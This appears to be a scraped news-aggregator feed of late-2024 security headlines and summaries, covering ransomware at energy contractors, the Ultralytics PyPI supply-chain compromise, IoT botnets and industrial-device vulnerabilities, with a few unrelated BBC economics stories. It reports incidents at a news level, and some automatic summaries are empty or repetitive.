  Romanian energy supplier Electrica hit by ransomware attack

  exploits ransomware industry
  2024-12-09 https://www.bleepingcomputer.com/news/security/romanian-energy-supplier-electrica-hit-by-ransomware-attack/
  Electrica Group, a key player in the Romanian electricity distribution and supply market, is investigating a ransomware attack that was still "in progress" earlier today. [...] "

  Autosummary: "

  ---

  Ultralytics AI Library Compromised: Cryptocurrency Miner Found in PyPI Versions

  industry
  2024-12-07 https://thehackernews.com/2024/12/ultralytics-ai-library-compromised.html
  In yet another software supply chain attack, it has come to light that two versions of a popular Python artificial intelligence (AI) library named ultralytics were compromised to deliver a cryptocurrency miner. The versions, 8.3.41 and 8.3.42, have since been removed from the Python Package Index (PyPI) repository. A subsequently released version has introduced a security fix that "ensures "

  Autosummary: "

  ---

  Ultralytics AI model hijacked to infect thousands with cryptominer

  industry
  2024-12-06 https://www.bleepingcomputer.com/news/security/ultralytics-ai-model-hijacked-to-infect-thousands-with-cryptominer/
  The popular Ultralytics YOLO11 AI model was compromised in a supply chain attack to deploy cryptominers on devices running versions 8.3.41 and 8.3.42 from the Python Package Index (PyPI)   [...] "

  Autosummary: " Comment by Glenn Jocher on GitHub Source: BleepingComputer ​ The developers are currently investigating the root cause, and potential vulnerabilities in the Ultralytics build environment to determine how it was breached. "

  ---

  US government, energy sector contractor hit by ransomware

  exploits government ransomware industry
  2024-12-03 https://www.helpnetsecurity.com/2024/12/03/englobal-ransomware-attack/
  

  ENGlobal, a Texas-based engineering and automation contractor for companies in the energy sector, has had its data encrypted by attackers. “On November 25, 2024, ENGlobal Corporation (the “Company”) became aware of a cybersecurity incident. The preliminary investigation has revealed that a threat actor illegally accessed the Company’s information technology (“IT”) system and encrypted some of its data files,” the company shared in an 8-K filed on Monday with the US Securities and Exchange Commission. The … More →

  The post US government, energy sector contractor hit by ransomware appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  Energy industry contractor ENGlobal Corporation discloses a ransomware attack

  exploits ransomware industry
  2024-12-03 https://securityaffairs.com/171617/cyber-crime/englobal-corporation-disclosed-a-ransomware-attack.html
  ENGlobal Corporation disclosed a ransomware attack, discovered on November 25, disrupting operations, in a filing to the SEC. A ransomware attack disrupted the operations of a major energy industry contractor, ENGlobal Corporation. Founded in 1985, ENGlobal Corporation designs automated control systems for commercial and government sectors, reporting $6 million in Q3 revenue and $18.4 million […] "

  Autosummary: Energy industry contractor ENGlobal Corporation discloses a ransomware attack Pierluigi Paganini December 03, 2024 December 03, 2024 ENGlobal Corporation disclosed a ransomware attack, discovered on November 25, disrupting operations, in a filing to the SEC. "

  ---

  SmokeLoader Malware Resurfaces, Targeting Manufacturing and IT in Taiwan

  exploits industry
  2024-12-02 https://thehackernews.com/2024/12/smokeloader-malware-resurfaces.html
  Taiwanese entities in manufacturing, healthcare, and information technology sectors have become the target of a new campaign distributing the SmokeLoader malware. "SmokeLoader is well-known for its versatility and advanced evasion techniques, and its modular design allows it to perform a wide range of attacks," Fortinet FortiGuard Labs said in a report shared with The Hacker News. "While "

  Autosummary: The malware supports several plugins that can steal login and FTP credentials, email addresses, cookies, and other information from web browsers, Outlook, Thunderbird, FileZilla, and WinSCP. "

  ---

  Trump threatens 100% tariff on Brics nations if they try to replace dollar

  industry
  2024-12-01 https://www.bbc.com/news/articles/cgrwj0p2dd9o
  The president-elect warned the group of nine nations against moving away from the dollar. "

  Autosummary: Major world powers China and Russia are part of the Brics alliance, along with Brazil, India, South Africa, Iran, Egypt, Ethiopia and the United Arab Emirates. "

  ---

  Over Two Dozen Flaws Identified in Advantech Industrial Wi-Fi Access Points – Patch ASAP

  industry
  2024-11-28 https://thehackernews.com/2024/11/over-two-dozen-flaws-identified-in.html
  Nearly two dozen security vulnerabilities have been disclosed in Advantech EKI industrial-grade wireless access point devices, some of which could be weaponized to bypass authentication and execute code with elevated privileges. "These vulnerabilities pose significant risks, allowing unauthenticated remote code execution with root privileges, thereby fully compromising the confidentiality, "

  Autosummary: "

  ---

  Matrix Botnet Exploits IoT Devices in Widespread DDoS Botnet Campaign

  exploits industry
  2024-11-27 https://thehackernews.com/2024/11/matrix-botnet-exploits-iot-devices-in.html
  A threat actor named Matrix has been linked to a widespread distributed denial-of-service (DoD) campaign that leverages vulnerabilities and misconfigurations in Internet of Things (IoT) devices to co-opt them into a disruptive botnet. "This operation serves as a comprehensive one-stop shop for scanning, exploiting vulnerabilities, deploying malware, and setting up shop kits, showcasing a "

  Autosummary: "This operation serves as a comprehensive one-stop shop for scanning, exploiting vulnerabilities, deploying malware, and setting up shop kits, showcasing a do-it-all-yourself approach to cyberattacks," Assaf Morag, director of threat intelligence at cloud security firm Aqua, said. "

  ---

  Over 145,000 Industrial Control Systems Across 175 Countries Found Exposed Online

  industry
  2024-11-21 https://thehackernews.com/2024/11/over-145000-industrial-control-systems.html
  New research has uncovered more than 145,000 internet-exposed Industrial Control Systems (ICS) across 175 countries, with the U.S. alone accounting for over one-third of the total exposures. The analysis, which comes from attack surface management company Censys, found that 38% of the devices are located in North America, 35.4% in Europe, 22.9% in Asia, 1.7% in Oceania, 1.2% in South America, "

  Autosummary: The countries with the most ICS service exposures include the U.S. (more than 48,000), Turkey, South Korea, Italy, Canada, Spain, China, Germany, France, the U.K., Japan, Sweden, Taiwan, Poland, and Lithuania.The majority of exposed HMIs are located in the U.S., followed by Germany, Canada, France, Austria, Italy, the U.K., Australia, Spain, and Poland. "

  ---

  Ngioweb Botnet Fuels NSOCKS Residential Proxy Network Exploiting IoT Devices

  exploits industry
  2024-11-19 https://thehackernews.com/2024/11/ngioweb-botnet-fuels-nsocks-residential.html
  The malware known as Ngioweb has been used to fuel a notorious residential proxy service called NSOCKS, as well as by other services such as VN5Socks and Shopsocks5, new findings from Lumen Technologies reveal. "At least 80% of NSOCKS bots in our telemetry originate from the Ngioweb botnet, mainly utilizing small office/home office (SOHO) routers and IoT devices," the Black Lotus Labs team at "

  Autosummary: A breakdown of the residential proxy provider"s proxies by device type shows that the botnet operators have targeted a broad spectrum of vendors, including NETGEAR, Uniview, Reolink, Zyxel, Comtrend, SmartRG, Linear Emerge, Hikvision, and NUUO. "

  ---

  Argentina orders arrests of pro-Bolsonaro rioters

  latam industry
  2024-11-16 https://www.bbc.com/news/articles/c3demgg542do
  Many Bolsanaro supporters are believed to have fled to Argentina following prosecutions for the Brasilia riots "

  Autosummary: Argentina orders arrests of pro-Bolsonaro rioters Scores of Bolsanaro supporters are believed to have fled to Argentina following prosecutions for the January 2023 riots But others fled to Argentina to escape their sentences - particularly after far-right politician Javier Milei was elected president in December 2023. "

  ---

  "Amazing showcase" for UK gaming industry cancelled

  industry
  2024-11-15 https://www.bbc.com/news/articles/c5yxvxzp909o
  The organisers blamed "increasing costs and less demand" as the sector continues to struggle. "

  Autosummary: "

  ---

  Google Cloud Cybersecurity Forecast 2025: AI, geopolitics, and cybercrime take centre stage

  industry ciber
  2024-11-14 https://www.helpnetsecurity.com/2024/11/14/google-cybersecurity-forecast-2025/
  

  Google Cloud unveiled its Cybersecurity Forecast for 2025, offering a detailed analysis of the emerging threat landscape and key security trends that organizations worldwide should prepare for. The report delivers insights into the tactics of cyber adversaries, providing advice for increasing security posture in the coming year. The year of AI-driven cyberattacks The report highlights a shift in the cybersecurity landscape: the rise of artificial intelligence (AI) as a double-edged sword. While AI offers new … More →

  The post Google Cloud Cybersecurity Forecast 2025: AI, geopolitics, and cybercrime take centre stage appeared first on Help Net Security.

  "

  Autosummary: Key recommendations: Prioritize cloud security: Organisations should embrace cloud-native security solutions, such as cloud-based SIEM and SOAR platforms, to improve visibility, threat detection, and incident response capabilities. “2025 is going to be the year when AI moves from pilots and prototypes into large-scale adoption,” Phil Venables, VP, TI Security & CISO, Google Cloud, added. "

  ---

  OvrC Platform Vulnerabilities Expose IoT Devices to Remote Attacks and Code Execution

  industry
  2024-11-13 https://thehackernews.com/2024/11/ovrc-platform-vulnerabilities-expose.html
  A security analysis of the OvrC cloud platform has uncovered 10 vulnerabilities that could be chained to allow potential attackers to execute code remotely on connected devices. "Attackers successfully exploiting these vulnerabilities can access, control, and disrupt devices supported by OvrC; some of those include smart electrical power supplies, cameras, routers, home automation systems, and "

  Autosummary: The most severe of the flaws are listed below - CVE-2023-28649 (CVSS v4 score: 9.2), which allows an attacker to impersonate a hub and hijack a device (CVSS v4 score: 9.2), which allows an attacker to impersonate a hub and hijack a device CVE-2023-31241 (CVSS v4 score: 9.2), which allows an attacker to claim arbitrary unclaimed devices by bypassing the requirement for a serial number (CVSS v4 score: 9.2), which allows an attacker to claim arbitrary unclaimed devices by bypassing the requirement for a serial number CVE-2023-28386 (CVSS v4 score: 9.2), which allows an attacker to upload arbitrary firmware updates resulting in code execution (CVSS v4 score: 9.2), which allows an attacker to upload arbitrary firmware updates resulting in code execution CVE-2024-50381 (CVSS v4 score: 9.1), which allows an attacker to impersonate a hub and unclaim devices arbitrarily and subsequently exploit other flaws to claim it "With more devices coming online every day and cloud management becoming the dominant means of configuring and accessing services, more than ever, the impetus is on manufacturers and cloud service providers to secure these devices and connections," Katz said. "

  ---

  An energy efficient home - is it worth the cost?

  industry
  2024-11-12 https://www.bbc.com/news/articles/cqxwjwqw3xdo
  It can be hard to find good advice on how to make homes more energy efficient. "

  Autosummary: “We can model all the different options that are available, suitable for your home and your budget, and identify a package of measures,” says Liz Lainé, of Parity Projects, a housing data analysis company, which runs Ecofurb.Improving the energy efficiency of homes is “essential” for decarbonisation, says Gerald Charles, head of housing retrofit at the Centre for Sustainable Energy, but he adds that the current lack of good advice remains a genuine problem.Perseverance during the past three years paid off, however, and the couple’s 1930’s detached house now has improved insulation, a heat pump, and an electric car charging point. "

  ---

  5 Ways Behavioral Analytics is Revolutionizing Incident Response

  industry
  2024-11-12 https://thehackernews.com/2024/11/5-ways-behavioral-analytics-is.html
  Behavioral analytics, long associated with threat detection (i.e. UEBA or UBA), is experiencing a renaissance. Once primarily used to identify suspicious activity, it’s now being reimagined as a powerful post-detection technology that enhances incident response processes. By leveraging behavioral insights during alert triage and investigation, SOCs can transform their workflows to become more "

  Autosummary: For example, an "impossible travel" alert, which often creates false positives, flags logins from locations that are humanly impossible to reach in a short time (e.g., a New York login followed by one in Singapore five minutes later).By shifting from a front-line detection tool to a post-detection powerhouse, behavioral analytics provides the context needed to distinguish real threats from noise, avoid end-user disruptions, and accelerate response times.Traditional workflows often involve repetitive, manual tasks for each alert, such as digging into historical data, verifying normal patterns, or communicating with end-users. "

  ---

  AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

  exploits industry
  2024-11-08 https://thehackernews.com/2024/11/androxgh0st-malware-integrates-mozi.html
  The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware. "This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a "

  Autosummary: Oracle E-Business Suite (EBS) Unauthenticated arbitrary file upload vulnerability CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX21 firmware command injection vulnerability CVE-2024-4577 (CVSS score: 9.8) - PHP CGI argument injection vulnerability CVE-2024-36401 (CVSS score: 9.8) - GeoServer remote code execution vulnerability "The botnet cycles through common administrative usernames and uses a consistent password pattern," the company said. "

  ---

  iPhones in a law enforcement forensics lab mysteriously rebooted losing their After First Unlock (AFU) state

  government industry
  2024-11-08 https://securityaffairs.com/170683/mobile-2/iphones-in-law-enforcement-forensics-lab-mysteriously-rebooted.html
  Law enforcement warns that securely stored iPhones awaiting forensic examination are mysteriously rebooting, making them harder to unlock, reported 404 Media. Law enforcement warns that securely stored iPhones awaiting forensic examination are mysteriously rebooting, making them much harder to unlock, per a document obtained by 404 Media. 404 Media obtained the document from a mobile […] "

  Autosummary: iPhones in a law enforcement forensics lab mysteriously rebooted losing their After First Unlock (AFU) state Pierluigi Paganini November 08, 2024 November 08, 2024 Law enforcement warns that securely stored iPhones awaiting forensic examination are mysteriously rebooting, making them harder to unlock, reported 404 Media. "

  ---

  Critical vulnerability in Cisco industrial wireless access points fixed (CVE-2024-20418)

  exploits industry
  2024-11-07 https://www.helpnetsecurity.com/2024/11/07/cve-2024-20418/
  

  Cisco has fixed a critical command injection vulnerability (CVE-2024-20418) affecting its Ultra-Reliable Wireless Backhaul (URWB) Access Points that can be exploited via a HTTP requests and allows complete compromise of the devices. There are no workarounds to address this flaw, though vulnerable access points can be protected by switching off URWB mode, the company shared in the advisory. The good news is that the vulnerability was discovered by a Cisco employee during internal security testing … More →

  The post Critical vulnerability in Cisco industrial wireless access points fixed (CVE-2024-20418) appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  Cisco Releases Patch for Critical URWB Vulnerability in Industrial Wireless Systems

  exploits industry
  2024-11-07 https://thehackernews.com/2024/11/cisco-releases-patch-for-critical-urwb.html
  Cisco has released security updates to address a maximum severity security flaw impacting Ultra-Reliable Wireless Backhaul (URWB) Access Points that could permit unauthenticated, remote attackers to run commands with elevated privileges. Tracked as CVE-2024-20418 (CVS score: 10.0), the vulnerability has been described as stemming from a lack of input validation to the web-based management "

  Autosummary: "

  ---

  Industrial companies in Europe targeted with GuLoader

  industry
  2024-11-07 https://www.helpnetsecurity.com/2024/11/07/industrial-europe-spear-phishing-guloader/
  

  A recent spear-phishing campaign targeting industrial and engineering companies in Europe was aimed at saddling victims with the popular GuLoader downloader and, ultimately, a remote access trojan that would permit attackers to steal information from and access compromised computers whenever they wish. “The emails are sent from various email addresses including from fake companies and compromised accounts. The emails typically hijack an existing email thread or request information about an order,” Tara Gould, Threat Research … More →

  The post Industrial companies in Europe targeted with GuLoader appeared first on Help Net Security.

  "

  Autosummary: This allows malicious code to be run through a legitimate process, meaning security products may not detect the malware, or victims may not be alerted since the process will look like a normal Windows process,” Gould told Help Net Security. "

  ---

  North Korean hackers employ new tactics to compromise crypto-related businesses

  industry
  2024-11-07 https://www.helpnetsecurity.com/2024/11/07/north-korean-crypto-related-phishing/
  

  North Korean hackers are targeting crypto-related businesses with phishing emails and novel macOS-specific malware. The crypto-related phishing campaign Since July 2024, phishing emails seemingly containing helpful information on risks related to the rise of the price of Bitcoin have been sent to intended victims in cryptocurrency-related industries, SentinelLabs researchers have found. The phishing email (Source: SentinelLabs) The email urges the recipient to click on the “Open” button to download a PDF file, but doing that … More →

  The post North Korean hackers employ new tactics to compromise crypto-related businesses appeared first on Help Net Security.

  "

  Autosummary: “We might speculate that heightened attention on previous [Democratic People’s Republic of Korea] campaigns could have reduced the effectiveness of previous ‘social media grooming’ attempts, perhaps as a result of intended targets in DeFi, ETF and other crypto-related industries becoming more wary, but it is equally likely that such state-backed threat actors have sufficient resources to pursue multiple strategies simultaneously,” the researchers noted.In the case of this malware, the commands launch the backdoor written to disk earlier by the stage-one dropper,” Stokes told Help Net Security, and added that if the backdoor has been removed, the persistence mechanism will not be able to reinstall it. "

  ---

  Symbiotic provides developers with real-time feedback on potential security vulnerabilities

  industry
  2024-11-06 https://www.helpnetsecurity.com/2024/11/06/symbiotic-security-real-time-feedback/
  

  Symbiotic Security launched a real-time security for software development that combines detection and remediation with just-in-time training – incorporating security testing and training directly into the development process without breaking developers’ workflows. Backed with $3 million of seed funding from investors including Lerer Hippeau, Axeleo Capital, Factorial Capital, and others, the company has introduced its software-as-a-service that works with the developer’s Integrated Development Environment (IDE) and enables them to develop software more securely. A Ponemon … More →

  The post Symbiotic provides developers with real-time feedback on potential security vulnerabilities appeared first on Help Net Security.

  "

  Autosummary: “Traditional approaches to code security are broken, which we fix by integrating security at the time code is written,” said Jerome Robert, CEO, Symbiotic Security. "

  ---

  U.S. CISA adds PTZOptics camera bugs to its Known Exploited Vulnerabilities catalog

  exploits industry
  2024-11-05 https://securityaffairs.com/170595/security/u-s-cisa-adds-ptzoptics-camera-bugs-to-its-known-exploited-vulnerabilities-catalog.html
  U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds PTZOptics PT30X-SDI/NDI camera bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Threat actors are attempting to exploit the two zero-day vulnerabilities CVE-2024-8956 and CVE-2024-8957 in PTZOptics pan-tilt-zoom (PTZ) live streaming cameras, GretNoise researchers warned last week. GreyNoise […] "

  Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-8957 PTZOptics PT30X-SDI/NDI Cameras OS Command Injection Vulnerability CVE-2024-8956 PTZOptics PT30X-SDI/NDI Cameras Authentication Bypass Vulnerability Threat actors are attempting to exploit the two zero-day vulnerabilities CVE-2024-8956 and CVE-2024-8957 in PTZOptics pan-tilt-zoom (PTZ) live streaming cameras, GretNoise researchers warned last week. "

  ---

  Cyber Threats That Could Impact the Retail Industry This Holiday Season (and What to Do About It)

  industry
  2024-11-04 https://thehackernews.com/2024/11/cyber-threats-that-could-impact-retail.html
  As the holiday season approaches, retail businesses are gearing up for their annual surge in online (and in-store) traffic. Unfortunately, this increase in activity also attracts cybercriminals looking to exploit vulnerabilities for their gain.  Imperva, a Thales company, recently published its annual holiday shopping cybersecurity guide. Data from the Imperva Threat Research team’s "

  Autosummary: Key steps include evaluating traffic risks, identifying entry points, blocking outdated user agents, limiting proxies, implementing rate limiting, and monitoring for signs of automation or headless browsers. DDoS Attacks Remain a Persistent Threat Distributed Denial-of-Service (DDoS) attacks are nearly as common as business logic abuse, representing 30.6% of AI-driven threats to retailers — and they are becoming progressively more prominent. The financial impact of a successful DDoS attack can be staggering, with businesses facing revenue loss, increased recovery costs, and potential long-term damage to their brand reputation. "

  ---

  PTZOptics cameras zero-days actively exploited in the wild

  exploits industry
  2024-11-02 https://securityaffairs.com/170456/hacking/ptzoptics-cameras-flaws-exploited.html
  Hackers are exploiting two zero-day vulnerabilities, tracked as CVE-2024-8956 and CVE-2024-8957, in PTZOptics cameras. Threat actors are attempting to exploit two zero-day vulnerabilities, tracked as CVE-2024-8956 and CVE-2024-8957, in PTZOptics pan-tilt-zoom (PTZ) live streaming cameras, GretNoise researchers warn. GreyNoise discovered the two flaws while investigating the use of an exploit detected by its LLM-powered threat-hunting tool Sift. The company discovered […] "

  Autosummary: PTZOptics cameras zero-days actively exploited in the wild Pierluigi Paganini November 02, 2024 November 02, 2024 Hackers are exploiting two zero-day vulnerabilities, tracked as CVE-2024-8956 and CVE-2024-8957, in PTZOptics cameras. "

  ---

  Threat actors are stepping up their tactics to bypass email protections

  industry
  2024-11-01 https://www.helpnetsecurity.com/2024/11/01/cybercriminals-emails-protections-video/
  

  Although most organizations use emails with built-in security features that filter out suspicious messages, criminals always find a way to bypass these systems. With the development of AI technology, phishing is becoming increasingly difficult to recognize, allowing them to circumvent security measures. While most attempts do not succeed, it only takes one to cause significant damage to a company’s operations. Mick Leach, Field CISO at Abnormal Security, discusses why the automotive industry is the new … More →

  The post Threat actors are stepping up their tactics to bypass email protections appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  Stop LUCR-3 Attacks: Learn Key Identity Security Tactics in This Expert Webinar

  industry
  2024-11-01 https://thehackernews.com/2024/11/stop-lucr-3-attacks-learn-key-identity.html
  Did you know that advanced threat actors can infiltrate the identity systems of major organizations and extract sensitive data within days? It’s a chilling reality, becoming more common and concerning by the day. These attackers exploit vulnerabilities in SaaS and cloud environments, using compromised identities to move laterally within networks, causing widespread damage. Cybersecurity and IT "

  Autosummary: Gain practical strategies for identifying and responding to suspicious activity across identity providers, cloud platforms, and SaaS applications. "

  ---

  IoT needs more respect for its consumers, creations, and itself

  industry
  2024-10-31 https://www.helpnetsecurity.com/2024/10/31/connected-device-privacy/
  

  Yet again, connected devices are in the news for all the wrong reasons. In October, security researchers found that robot vacuums from Chinese company, Ecovacs, can be compromised via a backdoor. In one case, hackers gained control over the device and shouted slurs at the homeowners. Worse still: the company doesn’t take responsibility and tells users they “do not need to worry excessively” about the vulnerability. This hack is another unfortunate example of connected device … More →

  The post IoT needs more respect for its consumers, creations, and itself appeared first on Help Net Security.

  "

  Autosummary: But the implications are far more sinister – these always-connected, sensor-equipped devices could be used to eavesdrop on private conversations, stalk targets, or even conduct corporate intelligence gathering by scanning homes for products and brands.And yet, despite multiple high-profile stories, poor products with lax security are concerningly common, a clear danger with cameras and microphones in the mix.The smart home and office are, in essence, our personal and professional lives, and I’m certainly not comfortable with companies playing fast and loose with cybersecurity standards. "

  ---

  Sophos mounted counter-offensive operation to foil Chinese attackers

  industry
  2024-10-31 https://www.helpnetsecurity.com/2024/10/31/sophos-china-defensive-operation/
  

  Sophos conducted defensive and counter-offensive operation over the last five years with multiple interlinked nation-state adversaries based in China targeting perimeter devices, including Sophos Firewalls. Espionage campaigns tied to Chinese hacking groups The attackers used a series of campaigns with novel exploits and customized malware to embed tools to conduct surveillance, sabotage and cyberespionage as well as overlapping tactics, tools and procedures (TTPs) with well-known Chinese nation-state groups including Volt Typhoon, APT31 and APT41. The … More →

  The post Sophos mounted counter-offensive operation to foil Chinese attackers appeared first on Help Net Security.

  "

  Autosummary: Minimize internet-facing services and devices when possible Prioritize patching with urgency for internet-facing devices and monitor these devices Enable hotfixes for edge devices to be allowed and applied automatically Collaborate with law enforcement, public-private partners, and government to share and act on relevant IoCs Create a plan for how your organization deals with EOL devices “We need to work collaboratively across the public and private sector, law enforcement and governments, and the security industry, to share what we know about these adversarial operations. While they released details starting in 2020 on the campaigns associated, including Cloud Snooper and Asnarök, the company is sharing the overall investigation analysis to raise awareness of the persistence of Chinese nation-state adversaries and their hyperfocus to compromise perimeter, unpatched and end-of-life (EOL) devices, often via zero-day exploits they are creating for those devices.The adversaries targeted both small and large critical infrastructure and government targets, primarily located in South and South-East Asia, including nuclear energy suppliers, a national capital’s airport, a military hospital, state security apparatus, and central government ministries. "

  ---

  New LightSpy Spyware Version Targets iPhones with Increased Surveillance Tactics

  industry
  2024-10-31 https://thehackernews.com/2024/10/new-lightspy-spyware-version-targets.html
  Cybersecurity researchers have discovered an improved version of an Apple iOS spyware called LightSpy that not only expands on its functionality, but also incorporates destructive capabilities to prevent the compromised device from booting up. "While the iOS implant delivery method closely mirrors that of the macOS version, the post-exploitation and privilege escalation stages differ "

  Autosummary: " The plugins can capture a wide range of data, including Wi-Fi network information, screenshots, location, iCloud Keychain, sound recordings, photos, browser history, contacts, call history, and SMS messages, as well as gather information from apps like Files, LINE, Mail Master, Telegram, Tencent QQ, WeChat, and WhatsApp. "

  ---

  Fraudsters revive old tactics mixed with modern technology

  industry
  2024-10-28 https://www.helpnetsecurity.com/2024/10/28/payments-fraud-schemes/
  

  Threat actors continue to probe the payments ecosystem for vulnerabilities and were successful in conducting fraud schemes affecting multiple financial institutions, technologies, and processes, according to Visa. The resurgence of physical theft Scammers are going back to basics with an increase of physical theft over the past six months, capitalizing on the window between the theft and the victim’s awareness. After a theft, the most common ways the criminals are capitalizing on their theft by … More →

  The post Fraudsters revive old tactics mixed with modern technology appeared first on Help Net Security.

  "

  Autosummary: The threat actor toolbox has evolved to include an expanding collection of cybercrime-as-a-service offerings, such as proxy networks, ransomware-as-a-service variants, and fraud tutorials, enabling them to scale their campaigns more effectively. Similarly, in March of 2023, Visa identified an emerging threat dubbed “digital pickpocketing,” where cybercriminals use a mobile point-of-sale device to tap against unsuspecting consumers’ wallets and initiate a payment, often in crowded areas. "

  ---

  World"s most indebted oil firm is headache for new Mexico leader

  latam industry
  2024-10-28 https://www.bbc.com/news/articles/c2dpd8l4n69o
  Claudia Sheinbaum inherits a buoyant manufacturing sector, but also a troubled state-owned oil firm. "

  Autosummary: Washington’s disapproval of the measure, as publicly expressed by the US Ambassador to Mexico, Ken Salazar, suggested it could complicate, even jeopardise, parts of the USMCA renegotiation.Sheinbaum must strike a difficult balance, he adds, in getting Pemex to sell more of its products “which are obviously fossil fuels and oil-based, while at the same time addressing Mexico’s climate change responsibilities and dealing with urgent issues in our cities, like air pollution”. "

  ---

  Cubans endure days without power as energy crisis hits hard

  industry
  2024-10-26 https://www.bbc.com/news/articles/cx2nezzw8z9o
  People cook with firewood after days of blackouts and supply issues. "

  Autosummary: AFP Cuba"s energy infrastructure needs more investment, economists say Speaking last Sunday, at the height of what was Cuba’s most acute energy crisis in years, the country’s energy and mines minister, Vicente de la O Levy, blamed the problems for the country’s creaking electrical infrastructure on what he called the “brutal” US economic embargo on Cuba.“It’s especially hard on the children”, Marbeyis adds, her eyes tearing up, “because when they say I want this or that, we have nothing to give them.”“We’ve had no power for six days”, she says, brewing coffee on a makeshift charcoal stove inside her breeze-block, tin-roofed shack.In every step, a lot of investment is needed,” says Cuban economist, Ricardo Torres, at the American University in Washington DC. "

  ---

  Venezuela vents its anger at Brazil"s Brics snub

  latam industry
  2024-10-25 https://www.bbc.com/news/articles/c624m4kgrg3o
  Venezuela criticises Brazil"s decision to veto its admission to the Brics group of emerging economies. "

  Autosummary: Jair Bolsonaro has applied against Venezuela for years, reproducing the hatred, exclusion and intolerance promoted from the centres of power in the West," the Venezuelan foreign ministry said in a statement. "

  ---

  New Qilin.B Ransomware Variant Emerges with Improved Encryption and Evasion Tactics

  exploits ransomware industry
  2024-10-24 https://thehackernews.com/2024/10/new-qilinb-ransomware-variant-emerges.html
  Cybersecurity researchers have discovered an advanced version of the Qilin ransomware sporting increased sophistication and tactics to evade detection. The new variant is being tracked by cybersecurity firm Halcyon under the moniker Qilin.B. "Notably, Qilin.B now supports AES-256-CTR encryption for systems with AESNI capabilities, while still retaining Chacha20 for systems that lack this support "

  Autosummary: "Out of the 99 healthcare organizations that admitted to paying the ransom and disclosed the ransom paid, the median payment was $1.5 million, and the average payment was $4.4 million," the tech giant said. "

  ---

  New Grandoreiro Banking Malware Variants Emerge with Advanced Tactics to Evade Detection

  financial exploits industry
  2024-10-23 https://thehackernews.com/2024/10/new-grandoreiro-banking-malware.html
  New variants of a banking malware called Grandoreiro have been found to adopt new tactics in an effort to bypass anti-fraud measures, indicating that the malicious software is continuing to be actively developed despite law enforcement efforts to crack down on the operation. "Only part of this gang was arrested: the remaining operators behind Grandoreiro continue attacking users all over the "

  Autosummary: "Grandoreiro searches for anti-malware solutions such as AVAST, Bitdefender, Nod32, Kaspersky, McAfee, Windows Defender, Sophos, Virus Free, Adaware, Symantec, Tencent, Avira, ActiveScan, and CrowdStrike," the company said. "

  ---

  Palo Alto Networks extends security into harsh industrial environments

  industry
  2024-10-22 https://www.helpnetsecurity.com/2024/10/22/palo-alto-networks-ot-security/
  

  The convergence of IT and operational technology (OT) and the digital transformation of OT have created new opportunities for innovation and efficiency in critical Industrial Automation and Control Systems. However, these advancements also broaden the potential attack surface, making it even more crucial to improve and extend security for OT environments. Palo Alto Networks introduced new capabilities in its OT Security solution, including the industry’s only fully integrated, risk-based guided virtual patching solution, powered by … More →

  The post Palo Alto Networks extends security into harsh industrial environments appeared first on Help Net Security.

  "

  Autosummary: Palo Alto Networks introduced new capabilities in its OT Security solution, including the industry’s only fully integrated, risk-based guided virtual patching solution, powered by Precision AI, the Prisma Access Browser with Privileged Remote Access and a suite of ruggedized, ML-powered Next-Generation Firewalls (NGFWs) built to withstand harsh industrial settings where traditional firewalls often cannot operate. "

  ---

  Evolving cybercriminal tactics targeting SMBs

  industry ciber
  2024-10-21 https://www.helpnetsecurity.com/2024/10/21/bec-human-error-video/
  

  A recent Todyl report revealed a 558% increase in BEC (Business Email Compromise), AiTM (Adversary-in-the-Middle), and ATO (Account Takeover) attacks in 2024. In this Help Net Security video, David Langlands, Chief Security Officer at Todyl, discusses these evolving cyber threats. Here are the key findings from the report: BEC is evolving as attackers shift from traditional malware to exploiting human error and vulnerable communication channels. Attackers are exploiting gaps in security like the lack of … More →

  The post Evolving cybercriminal tactics targeting SMBs appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  This industry profits from knowing you have cancer, explains Cody Venzke (Lock and Code S05E22)

  industry
  2024-10-21 https://www.malwarebytes.com/blog/podcast/2024/10/this-industry-profits-from-knowing-you-have-cancer-explains-cody-venzke-lock-and-code-s05e22
  This week on the Lock and Code podcast, we speak with Cody Venzke about why data brokers are allowed to collect everything about us. "

  Autosummary: Today, on the Lock and Code podcast with host David Ruiz, we speak with Cody Venzke, senior policy counsel with the ACLU, about how data brokers collect their information, what data points are off-limits (if any), and how people can protect their sensitive information, along with the harms that come from unchecked data broker activity—beyond just targeted advertising. "

  ---

  How NIS2 will impact sectors from healthcare to energy

  industry
  2024-10-17 https://www.helpnetsecurity.com/2024/10/17/mick-baccio-splunk-nis2-challenges/
  

  In this Help Net Security interview, Mick Baccio, Global Security Advisor at Splunk SURGe, discusses the far-reaching implications of the NIS2 Directive beyond traditional IT security. He explains how NIS2 will fundamentally change cybersecurity governance, making it a core aspect of organizational strategy and accountability. Many experts suggest that the NIS2 Directive has far-reaching implications beyond IT security. Could you expand on the specific non-technical requirements that companies must be aware of? The NIS2 Directive … More →

  The post How NIS2 will impact sectors from healthcare to energy appeared first on Help Net Security.

  "

  Autosummary: The NIS2 Directive significantly broadens its scope compared to NIS1, now encompassing critical sectors such as telecommunications, food production, waste management, energy, healthcare, and chemical manufacturing.Moreover, as not all services benefit from a one-stop shop jurisdiction regime, some entities will face up to 27 distinct registration, auditing, and enforcement regimes. "

  ---

  Marriott settles with FTC, to pay $52 million over data breaches

  financial industry
  2024-10-10 https://www.bleepingcomputer.com/news/legal/marriott-settles-with-ftc-to-pay-52-million-over-data-breaches/
  Marriott International and its subsidiary Starwood Hotels will pay $52 million and create a comprehensive information security program as part of settlements for data breaches that impacted over 344 million customers. [...] "

  Autosummary: The exposed data included names, email addresses, postal addresses, phone numbers, dates of birth, and loyalty account information. "

  ---

